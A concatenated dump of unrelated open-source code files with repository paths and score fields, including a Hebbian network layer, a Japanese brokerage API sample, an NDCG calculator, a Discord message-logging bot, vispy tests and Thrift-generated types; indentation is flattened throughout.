FC = 'fc'
CLASS_SCORES = FC # Symbolic name of the layer providing the class scores as output
def __init__(self, input_shape=P.INPUT_SHAPE):
super(Net, self).__init__()
# Shape of the tensors that we expect to receive as input
self.input_shape = input_shape
if len(input_shape) != 3: self.input_shape = (input_shape[0], 1, 1)
# Here we define the layers of our network
# FC Layers
self.fc = H.HebbianMap2d(
in_channels=self.input_shape[0],
out_size=P.NUM_CLASSES,
kernel_size=(self.input_shape[1], self.input_shape[2]),
competitive=False,
eta=0.1,
) # conv kernels with the same height, width depth as input (equivalent to a FC layer), 10 kernels (one per class)
# Here we define the flow of information through the network
def forward(self, x):
out = {}
# Linear FC layer, outputs are the class scores
fc_out = self.fc(x.view(-1, *self.input_shape)).view(-1, P.NUM_CLASSES)
# Build dictionary containing outputs from convolutional and FC layers
out[self.FC] = fc_out
return out
# Function for setting teacher signal for supervised hebbian learning
def set_teacher_signal(self, y):
self.fc.set_teacher_signal(y)
| 2.3125 | 2 |
sample/sample.py | dogwood008/python-kabusapi | 11 | 29188 | <reponame>dogwood008/python-kabusapi
import kabusapi
url = "localhost"
port = "18081" # 検証用, 本番用は18080
password = "<PASSWORD>"
# 初期設定・トークン取得
api = kabusapi.Context(url, port, password)
# 取得トークンの表示
print(api.token)
# トークンを指定した初期設定 パスワードが不要
api = kabusapi.Context(url, port, token='<PASSWORD>')
# 注文発注 (現物買い)
data = {
"Password": "<PASSWORD>",
"Symbol": 8306, # MUFG
"Exchange": 1,
"SecurityType": 1,
"Side": 2,
"CashMargin": 1,
"MarginTradeType": None,
"DelivType": 1,
"FundType": "02",
"AccountType": 4,
"Qty": 100,
"ClosePositionOrder": None,
"Price": 0,
"ExpireDay": 0,
"FrontOrderType": 10,
}
response = api.sendorder(**data)
# 注文取消
data = {
"OrderId": "hoge",
"Password": "<PASSWORD>",
}
response = api.cancelorder(**data)
# 取引余力(現物)
response = api.wallet.cash()
# 取引余力(現物)(銘柄指定)
data = {
"symbol": 8306,
"exchange": 1,
}
response = api.wallet.cash(**data)
# 取引余力(信用)
response = api.wallet.margin()
# 取引余力(信用)(銘柄指定)
data = {
"symbol": 8306,
"exchange": 1,
}
response = api.wallet.margin(**data)
# 時価情報・板情報
data = {
"symbol": 8306,
"exchange": 1,
}
response = api.board(**data)
# 銘柄情報
data = {
"symbol": 8306,
"exchange": 1,
}
response = api.symbol(**data)
# 注文約定照会
response = api.orders()
# 残高照会
response = api.positions()
# 銘柄登録
data = {
"Symbols": [
{"Symbol": 8306, "Exchange": 1, },
{"Symbol": 9433, "Exchange": 1, },
]
}
response = api.register(**data)
# 銘柄登録解除
data = {
"Symbols": [
{"Symbol": 8306, "Exchange": 1, },
{"Symbol": 9433, "Exchange": 1, },
]
}
response = api.unregister(**data)
# 銘柄登録全解除
response = api.unregister.all()
| 1.359375 | 1 |
notebook/03-udacityIntroductionToMachineLearning/projects/datasets_questions/utils/read_names.py | EmanuelFontelles/machineLearning | 2 | 29316 | import pandas as pd
import sys
from os import system
sys.path.append('../final_project/')
sys.path.append('../')
def readNames(inputFile='new_poi_names.txt'):
'''
A function to read names data from a file create by a data cache
Returns:
Returns a data frame that contains data from 'poi_names.txt'
'''
#bash_command = 'bash script.sh'
#system(bash_command)
data = pd.read_csv(inputFile, skiprows=2, delimiter=';', header=None, names=['Ans', 'Name'])
return(data) | 1.890625 | 2 |
peakinvestigator/actions/run.py | jct197/PeakInvestigator-Python-SDK | 0 | 29444 | <reponame>jct197/PeakInvestigator-Python-SDK
## -*- coding: utf-8 -*-
#
# Copyright (c) 2016, Veritomyx, Inc.
#
# This file is part of the Python SDK for PeakInvestigator
# (http://veritomyx.com) and is distributed under the terms
# of the BSD 3-Clause license.
from .base import BaseAction
class RunAction(BaseAction):
"""This class is used to make a RUN call to the PeakInvestigator
API. See https://peakinvestigator.veritomyx.com/api/#RUN.
It is constructed with a Fluent API because of the number of required
arguments.
"""
def __init__(self, version, username, password, jobID,
response_time_objective):
"""Constructor
"""
super(RunAction,self).__init__(version, username, password)
self._jobID = jobID
self._response_time_objective = response_time_objective
def with_files(self, *args, **kwds):
"""Specify the production and calibration data files using either
function arguments or keywords.
First try keywords. If those are missing, use args[0] for production and
args[1] for calibration, if it exists.
"""
if "production" in kwds:
self._production = kwds["production"]
else:
self._production = args[0]
if "calibration" in kwds:
self._calibration = kwds["calibration"]
elif len(args) == 2:
self._calibration = args[1]
return self
def build_query(self):
query = super(RunAction,self).build_query()
query["Action"] = "RUN"
query["Job"] = self._jobID
query["RTO"] = self._response_time_objective
query["InputFile"] = self._production
if hasattr(self, "_calibration"):
query["CalibrationFile"] = self._calibration
return query
@property
def job(self):
super(RunAction,self).precheck()
return self._data["Job"]
| 1.1875 | 1 |
ingredient_parser/__init__.py | johnwmillr/RecipesAPI | 0 | 29572 | __author__ = 'sheraz'
__all__ = ['parse','normalize']
from ingredient_parser.en import parse
| 0.324219 | 0 |
research/recommend/Fat-DeepFFM/eval310.py | leelige/mindspore | 77 | 29700 | <reponame>leelige/mindspore
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""postprocess."""
import argparse
import os
import numpy as np
from mindspore import Tensor
from src.config import ModelConfig
from src.metrics import AUCMetric
parser = argparse.ArgumentParser(description='CTR Prediction')
parser.add_argument('--result_path', type=str, default="./result_Files", help='Dataset path')
parser.add_argument('--label_path', type=str, default="./CriteoBinary/batch_labels", help='Checkpoint path')
args = parser.parse_args()
def get_acc():
''' get accuracy '''
config = ModelConfig()
batch_size = config.batch_size
auc_metric = AUCMetric()
files = os.listdir(args.label_path)
for f in files:
rst_file = os.path.join(args.result_path, f.split('.')[0] + '_0.bin')
label_file = os.path.join(args.label_path, f)
logit = Tensor(np.fromfile(rst_file, np.float32).reshape(batch_size, 1))
label = Tensor(np.fromfile(label_file, np.float32).reshape(batch_size, 1))
res = []
res.append(logit)
res.append(logit)
res.append(label)
auc_metric.update(*res)
auc = auc_metric.eval()
print("auc : {}".format(auc))
if __name__ == '__main__':
get_acc()
| 1.367188 | 1 |
src/relevancy_measures/calc_NCDG.py | dannycho7/RTP_Latest | 0 | 29828 | <filename>src/relevancy_measures/calc_NCDG.py<gh_stars>0
#!/usr/bin/python3
import sys
import argparse
import math
parser = argparse.ArgumentParser(description='Post-processing after labeling, please put your rating in a file with '
'the same order as in docs.txt, one rating per line.')
parser.add_argument('--doc', required=True, help='path for doc_id_union.txt')
parser.add_argument('--rating', required=True, help='path for your rating file')
parser.add_argument('--result', required=True, help='list of doc_id.txt, separated by colon')
parser.add_argument('--dict', default='phase1/gen_index/vdrelation.txt', help='path for vdrelation.txt')
parser.add_argument('-n', type=int, default=10, help='number of results')
args = parser.parse_args()
v_id_path = args.doc
rating_path = args.rating
result_paths = args.result.split(',')
v_ids = []
ratings = []
data = []
try:
print('Reading vid-did mapping ...')
# read vid-did map from vdrelation.txt
vd_map = {}
with open(args.dict, 'r') as f:
for line in f:
v_id, doc_id = line.split()
vd_map[v_id] = doc_id
# read document ids
with open(v_id_path, 'r') as f:
for line in f:
v_id = line.split()[0]
v_ids.append(v_id)
# read ratings
with open(rating_path, 'r') as f:
for line in f:
rating = int(line.split()[0])
ratings.append(rating)
rating_map = dict(zip(v_ids, ratings))
# read data from each result file
for path in result_paths:
with open(path, 'r') as f:
local_v_ids = []
for line in f:
v_id = line.split()[0]
local_v_ids.append((v_id, rating_map[v_id]))
data.append((path, local_v_ids))
# generate ideal rating order
unique_ratings = {}
for v_id, rating in rating_map.items():
if vd_map[v_id] in unique_ratings:
current_rating = unique_ratings[vd_map[v_id]]
if rating > current_rating:
unique_ratings[vd_map[v_id]] = rating
else:
unique_ratings[vd_map[v_id]] = rating
rating_order = list(unique_ratings.values())
rating_order.sort(reverse=True)
ideal_rating_order = rating_order[:args.n] + [0] * (args.n - len(rating_order[:args.n])) # fix: fill the empty entries with 0s
# calculate and generate result
for path, rating_list in data:
title = ' @ '.join(path.split('/')[-3:-1])
print('\nResult for', title, '\n')
print('{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}\t{:<8}'.format('Rank','VID','Rating','Relevance','DCG','Ideal Rating','Ideal Relevance','IDCG','NDCG'))
# print('Rank\tRating\tRelevance\tDCG\tIdeal Rating\tIdeal Relevance\tIDCG\tNDCG')
rank = 1
dcg = 0
idcg = 0
filled_rating_list = rating_list + [('Empty', 0)] * (args.n - len(rating_list))
for v_id, rating in filled_rating_list:
relevance = (2 ** rating - 1) / math.log2(1 + rank)
dcg += relevance
ideal_rating = ideal_rating_order[rank - 1]
ideal_relevance = (2 ** ideal_rating - 1) / math.log2(1 + rank)
idcg += ideal_relevance
ndcg = dcg / idcg
print('{:<8}\t{:<8}\t{:<8}\t{:<8.4f}\t{:<8.4f}\t{:<8}\t{:<8.4f}\t{:<8.4f}\t{:<8.4f}'.format(rank, v_id, rating, relevance, dcg, ideal_rating, ideal_relevance,
idcg, ndcg))
rank += 1
except IOError as e:
print('Cannot open necessary files', file=sys.stderr) | 2 | 2 |
loggerBot.py | jskrist/channelLogger | 0 | 29956 | <reponame>jskrist/channelLogger
import asyncio, discord, json
from discord.ext.commands import Bot
from discord.ext import commands
from tinydb import TinyDB, Query
from tinydb.operations import delete, increment
'''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
SETUP
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'''
# Create a bot
bot = Bot(description="Channel Logger Bot by jskrist#3569", command_prefix="!", pm_help = True)
# Start or connect to a database to log the messages
db = TinyDB('data.json')
# This is a Query object to use when searching through the database
msg = Query()
usr = Query()
'''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
HELPER FUNCTIONS
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'''
# this function returns a list of all the users that have posted to the server
def getPostingUsers():
postingUsers = set();
for item in db:
postingUsers.add(item['authorName'])
return postingUsers
async def addMsgToDB(message):
# Confirm that the message did not come from this Bot to make sure we don't get
# into an infinite loop if this bot send out any messages in this function also
# check that the first character of the message is not a "!" or "]", which would
# indicate a command
if (message.author.id != bot.user.id) & \
(message.content[0] != '!') & (message.content[0] != ']'):
# if the mesage content is not in the database yet
if not db.search(msg.content == message.content.lower()):
# Insert the content into the database, along with the name of the user that posted it.
# You could add any other data to the database at this point.
db.insert({'content': message.content.lower(), 'authorName': message.author.name})
'''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
BOT EVENTS AND COMMANDS
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'''
# This function prints a message to the terminal/command window to let you know the bot started correctly
@bot.event
async def on_ready():
print('Bot is up and running.')
# when a message comes into the server, this function is executed
@bot.listen()
async def on_message(message):
await addMsgToDB(message)
# when a message on the server is edited, this function is executed
@bot.listen()
async def on_message_edit(msgBefore, msgAfter):
'''
update the database to reflect only the edited message. This could create a state where a
duplicate message is on the server, but not represented in the database, e.g.
User1 sends "Hello"
User2 sends "Hello"
Database no has {'content':"hello", "authorName":"User1"}
User1 edits post to say "Hello World"
Database now has {'content':"hello world", "authorName":"User1"}
Should it also contain a copy of the message "hello"? since User2 also sent it?
'''
# db.update({'content': msgAfter.content.lower()}, msg.content == msgBefore.content.lower())
'''
Alternatively, you could just add the updated message to the database:
'''
await addMsgToDB(msgAfter)
@bot.command(pass_context=True)
async def printDB(context):
# this command prints out the contents of the database. It should not be used with a large database.
# the database will be save into a file called data.json (see line 12 of this file).
for item in db:
await bot.send_message(context.message.channel, item)
@bot.command(pass_context=True)
async def stats(context):
# this command returns the stats for each user, at the moment that is just the number of messages
# each user has posted, but could be expanded however you'd like
postingUsers = getPostingUsers()
for user in postingUsers:
userMsgs = db.search(msg.authorName == user)
await bot.send_message(context.message.channel, '{0} has {1} messages'.format(user, len(userMsgs)))
@bot.command(pass_context=True)
async def clearDB_all(context):
# this command removes all of messages from the Database
db.purge()
@bot.command(pass_context=True)
async def clearDB_usr(context, User=""):
# this command removes all of messages in the Database from the given user
db.remove(usr.authorName == User)
@bot.command(pass_context=True)
async def clearDB_msg(context, Msg=""):
# this command removes the given messages from the Database if it exists
db.remove(msg.content == Msg.lower())
'''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
STARTING THE BOT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'''
# this opens up a file named botToken.txt which should contain a single line of text; the bot's token
with open('botToken.txt', 'r') as myfile:
botToken = myfile.read().replace('\n', '')
# start the bot
bot.run(botToken)
| 1.84375 | 2 |
src/dump1090exporter/__init__.py | bgulla/dump1090-exporter | 60 | 30084 | <filename>src/dump1090exporter/__init__.py
from .exporter import Dump1090Exporter
__version__ = "21.10.0"
| 0.196289 | 0 |
webapp/starter/tracker/views.py | jersobh/docker-covidoff | 0 | 30212 | <gh_stars>0
from django.views import View
from django.http import JsonResponse
from tracker.models import Match
from tracker.forms import MatchForm
import json
class MatchView(View):
def put(self, request):
try:
body = request.body.decode('utf-8')
body = json.loads(body)
except json.decoder.JSONDecodeError as ex:
return JsonResponse({ 'error': str(ex) }, status=400)
form = MatchForm(body)
if not form.is_valid():
return JsonResponse(dict(form.errors.items()), status=422)
Match.objects.create(**{
'matcher': form.cleaned_data['matcher'],
'matchee': form.cleaned_data['matchee']
})
return JsonResponse({})
| 1.414063 | 1 |
firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefs/TESTS/util/stats.py | davewhiiite/uvc | 1 | 30340 | <filename>firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefs/TESTS/util/stats.py
#!/usr/bin/env python
import re
import sys
import subprocess
import os
def main(*args):
with open('main.cpp') as file:
tests = file.read()
cases = []
with open('template_all_names.txt') as file:
while True:
name = file.readline().strip('\n')
desc = file.readline().strip('\n')
if name == 'test_results':
break
cases.append((name, desc))
with open('template_wrapper.fmt') as file:
template = file.read()
with open('main.cpp', 'w') as file:
file.write(template.format(
tests=tests,
test_cases='\n'.join(
4*' '+'Case("{desc}", {name}),'.format(
name=name, desc=desc) for name, desc in cases)))
if __name__ == "__main__":
main(*sys.argv[1:])
| 1.445313 | 1 |
test.py | lexibank/asjp | 0 | 30468 | <gh_stars>0
def test_valid(cldf_dataset, cldf_logger):
assert cldf_dataset.validate(log=cldf_logger)
def test_parameters(cldf_dataset):
assert len(list(cldf_dataset["ParameterTable"])) == 100
def test_languages(cldf_dataset):
assert len(list(cldf_dataset["LanguageTable"])) > 4000
| 1.28125 | 1 |
vispy/geometry/tests/test_generation.py | chongxi/vispy | 3 | 30596 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import numpy as np
from numpy.testing import assert_array_equal, assert_allclose
from vispy.testing import run_tests_if_main
from vispy.geometry import (create_box, create_cube, create_cylinder,
create_sphere, create_plane)
def test_box():
"""Test box function"""
vertices, filled, outline = create_box()
assert_array_equal(np.arange(len(vertices)), np.unique(filled))
assert_array_equal(np.arange(len(vertices)), np.unique(outline))
def test_cube():
"""Test cube function"""
vertices, filled, outline = create_cube()
assert_array_equal(np.arange(len(vertices)), np.unique(filled))
assert_array_equal(np.arange(len(vertices)), np.unique(outline))
def test_sphere():
"""Test sphere function"""
md = create_sphere(rows=10, cols=20, radius=10, method='latitude')
radii = np.sqrt((md.get_vertices() ** 2).sum(axis=1))
assert_allclose(radii, np.ones_like(radii) * 10)
md = create_sphere(subdivisions=5, radius=10, method='ico')
radii = np.sqrt((md.get_vertices() ** 2).sum(axis=1))
assert_allclose(radii, np.ones_like(radii) * 10)
md = create_sphere(rows=20, cols=20, depth=20, radius=10, method='cube')
radii = np.sqrt((md.get_vertices() ** 2).sum(axis=1))
assert_allclose(radii, np.ones_like(radii) * 10)
def test_cylinder():
"""Test cylinder function"""
md = create_cylinder(10, 20, radius=[10, 10])
radii = np.sqrt((md.get_vertices()[:, :2] ** 2).sum(axis=1))
assert_allclose(radii, np.ones_like(radii) * 10)
def test_plane():
"""Test plane function"""
vertices, filled, outline = create_plane()
assert_array_equal(np.arange(len(vertices)), np.unique(filled))
assert_array_equal(np.arange(len(vertices)), np.unique(outline))
run_tests_if_main()
| 2.078125 | 2 |
communicate.py | IloveKanade/k3cgrouparch | 0 | 30724 | <filename>communicate.py
#!/usr/bin/env python2
# coding: utf-8
import logging
from collections import OrderedDict
from geventwebsocket import Resource
from geventwebsocket import WebSocketApplication
from geventwebsocket import WebSocketServer
import k3utfjson
from k3cgrouparch import account
global_value = {}
logger = logging.getLogger(__name__)
class CgroupArchWebSocketApplication(WebSocketApplication):
def on_open(self):
logger.info('on open')
def on_message(self, message_str):
if message_str is None:
return
try:
self.process_message(message_str)
except Exception as e:
logger.exception('failed to process message: ' + repr(e))
self.send_json({'error': repr(e)})
def on_close(self, reason):
logger.info('on close')
def process_message(self, message_str):
message = k3utfjson.load(message_str)
cmd = message['cmd']
args = message.get('args')
if args is None:
args = {}
result = self.do_cmd(cmd, args)
self.send_json(result)
def do_cmd(self, cmd, args):
if cmd == 'show_account':
return self.show_account(args)
elif cmd == 'get_conf':
return global_value['context']['arch_conf']
else:
return {'error': 'invalid cmd: %s' % cmd}
def show_account(self, args):
return account.show(global_value['context'], args)
def send_json(self, value):
value_str = k3utfjson.dump(value)
self.ws.send(value_str)
def run(context, ip='0.0.0.0', port=22348):
global_value['context'] = context
WebSocketServer(
(ip, port),
Resource(OrderedDict({'/': CgroupArchWebSocketApplication})),
).serve_forever()
| 1.625 | 2 |
sippy/thrift_stub_dir/thrift/ttypes.py | devatsrs/neon.service | 0 | 30852 | <gh_stars>0
#
# Autogenerated by Thrift Compiler (1.0.0-dev)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:new_style1
#
#from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import sys
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class CallError(object):
NO_ERROR = 0
EXTERNAL_TRANSLATOR_REJECT = 1
BODY_LESS_INVITE = 2
ACCOUNT_EXPIRED = 3
CONNECTION_CAPACITY_EXCEEDED = 4
MALFORMED_SDP = 5
UNSUPPORTED_CONTENT_TYPE = 6
UNACCEPTABLE_CODEC = 7
INVALID_AUTH_CLD_TRANS_RULE = 8
INVALID_AUTH_CLI_TRANS_RULE = 9
INVALID_ACNT_CLD_TRANS_RULE = 10
INVALID_ACNT_CLI_TRANS_RULE = 11
CANNOT_BIND_SESSION = 12
INVALID_DID_CLI_TRANS_RULE = 13
NO_RATE_FOUND = 14
CALL_LOOP_DETECTED = 15
TOO_MANY_SESSIONS = 16
ACCOUNT_IN_USE = 17
HIGH_CALL_RATE_PER_ACCOUNT = 18
HIGH_CALL_RATE = 19
INSUFFICIENT_BALANCE = 20
FORBIDDEN_DESTINATION = 21
NO_CUSTOMER_RATES = 22
LOSS_PROTECTION = 23
ADDRESS_INCOMPLETE = 24
NO_ROUTES = 25
HIGH_CALL_RATE_PER_CONNECTION = 26
INVALID_ASSRT_ID_CLI_TRANS_RULE = 27
DNCL_BLOCKED = 28
_VALUES_TO_NAMES = {
0: "NO_ERROR",
1: "EXTERNAL_TRANSLATOR_REJECT",
2: "BODY_LESS_INVITE",
3: "ACCOUNT_EXPIRED",
4: "CONNECTION_CAPACITY_EXCEEDED",
5: "MALFORMED_SDP",
6: "UNSUPPORTED_CONTENT_TYPE",
7: "UNACCEPTABLE_CODEC",
8: "INVALID_AUTH_CLD_TRANS_RULE",
9: "INVALID_AUTH_CLI_TRANS_RULE",
10: "INVALID_ACNT_CLD_TRANS_RULE",
11: "INVALID_ACNT_CLI_TRANS_RULE",
12: "CANNOT_BIND_SESSION",
13: "INVALID_DID_CLI_TRANS_RULE",
14: "NO_RATE_FOUND",
15: "CALL_LOOP_DETECTED",
16: "TOO_MANY_SESSIONS",
17: "ACCOUNT_IN_USE",
18: "HIGH_CALL_RATE_PER_ACCOUNT",
19: "HIGH_CALL_RATE",
20: "INSUFFICIENT_BALANCE",
21: "FORBIDDEN_DESTINATION",
22: "NO_CUSTOMER_RATES",
23: "LOSS_PROTECTION",
24: "ADDRESS_INCOMPLETE",
25: "NO_ROUTES",
26: "HIGH_CALL_RATE_PER_CONNECTION",
27: "INVALID_ASSRT_ID_CLI_TRANS_RULE",
28: "DNCL_BLOCKED",
}
_NAMES_TO_VALUES = {
"NO_ERROR": 0,
"EXTERNAL_TRANSLATOR_REJECT": 1,
"BODY_LESS_INVITE": 2,
"ACCOUNT_EXPIRED": 3,
"CONNECTION_CAPACITY_EXCEEDED": 4,
"MALFORMED_SDP": 5,
"UNSUPPORTED_CONTENT_TYPE": 6,
"UNACCEPTABLE_CODEC": 7,
"INVALID_AUTH_CLD_TRANS_RULE": 8,
"INVALID_AUTH_CLI_TRANS_RULE": 9,
"INVALID_ACNT_CLD_TRANS_RULE": 10,
"INVALID_ACNT_CLI_TRANS_RULE": 11,
"CANNOT_BIND_SESSION": 12,
"INVALID_DID_CLI_TRANS_RULE": 13,
"NO_RATE_FOUND": 14,
"CALL_LOOP_DETECTED": 15,
"TOO_MANY_SESSIONS": 16,
"ACCOUNT_IN_USE": 17,
"HIGH_CALL_RATE_PER_ACCOUNT": 18,
"HIGH_CALL_RATE": 19,
"INSUFFICIENT_BALANCE": 20,
"FORBIDDEN_DESTINATION": 21,
"NO_CUSTOMER_RATES": 22,
"LOSS_PROTECTION": 23,
"ADDRESS_INCOMPLETE": 24,
"NO_ROUTES": 25,
"HIGH_CALL_RATE_PER_CONNECTION": 26,
"INVALID_ASSRT_ID_CLI_TRANS_RULE": 27,
"DNCL_BLOCKED": 28,
}
class TransactionRecordType(object):
CALLS = 1
CDRS = 2
CDRS_CONNECTIONS = 3
CDRS_CUSTOMERS = 4
CDRS_DIDS = 5
CDRS_CONNECTIONS_DIDS = 6
SURCHARGES = 7
COMMISSIONS = 8
UPDATE_ACCOUNT_BALANCE = 9
UPDATE_CUSTOMER_BALANCE = 10
UPDATE_VENDOR_BALANCE = 11
UPDATE_PLAN_MINUTES = 12
QUALITY_STATS = 13
CALLS_SDP = 14
CDRS_CUSTOMERS_DIDS = 15
_VALUES_TO_NAMES = {
1: "CALLS",
2: "CDRS",
3: "CDRS_CONNECTIONS",
4: "CDRS_CUSTOMERS",
5: "CDRS_DIDS",
6: "CDRS_CONNECTIONS_DIDS",
7: "SURCHARGES",
8: "COMMISSIONS",
9: "UPDATE_ACCOUNT_BALANCE",
10: "UPDATE_CUSTOMER_BALANCE",
11: "UPDATE_VENDOR_BALANCE",
12: "UPDATE_PLAN_MINUTES",
13: "QUALITY_STATS",
14: "CALLS_SDP",
15: "CDRS_CUSTOMERS_DIDS",
}
_NAMES_TO_VALUES = {
"CALLS": 1,
"CDRS": 2,
"CDRS_CONNECTIONS": 3,
"CDRS_CUSTOMERS": 4,
"CDRS_DIDS": 5,
"CDRS_CONNECTIONS_DIDS": 6,
"SURCHARGES": 7,
"COMMISSIONS": 8,
"UPDATE_ACCOUNT_BALANCE": 9,
"UPDATE_CUSTOMER_BALANCE": 10,
"UPDATE_VENDOR_BALANCE": 11,
"UPDATE_PLAN_MINUTES": 12,
"QUALITY_STATS": 13,
"CALLS_SDP": 14,
"CDRS_CUSTOMERS_DIDS": 15,
}
class NullInt64(object):
"""
Attributes:
- v
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'v', None, None, ), # 1
)
def __init__(self, v=None,):
self.v = v
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.v = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('NullInt64')
if self.v is not None:
oprot.writeFieldBegin('v', TType.I64, 1)
oprot.writeI64(self.v)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class NullString(object):
"""
Attributes:
- s
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 's', 'UTF8', None, ), # 1
)
def __init__(self, s=None,):
self.s = s
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.s = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('NullString')
if self.s is not None:
oprot.writeFieldBegin('s', TType.STRING, 1)
oprot.writeString(self.s.encode('utf-8') if sys.version_info[0] == 2 else self.s)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class UnixTime(object):
"""
Attributes:
- seconds
- nanoseconds
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'seconds', None, None, ), # 1
(2, TType.I64, 'nanoseconds', None, None, ), # 2
)
def __init__(self, seconds=None, nanoseconds=None,):
self.seconds = seconds
self.nanoseconds = nanoseconds
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.seconds = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.nanoseconds = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('UnixTime')
if self.seconds is not None:
oprot.writeFieldBegin('seconds', TType.I64, 1)
oprot.writeI64(self.seconds)
oprot.writeFieldEnd()
if self.nanoseconds is not None:
oprot.writeFieldBegin('nanoseconds', TType.I64, 2)
oprot.writeI64(self.nanoseconds)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class MonoTime(object):
"""
Attributes:
- monot
- realt
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'monot', (UnixTime, UnixTime.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'realt', (UnixTime, UnixTime.thrift_spec), None, ), # 2
)
def __init__(self, monot=None, realt=None,):
self.monot = monot
self.realt = realt
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.monot = UnixTime()
self.monot.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.realt = UnixTime()
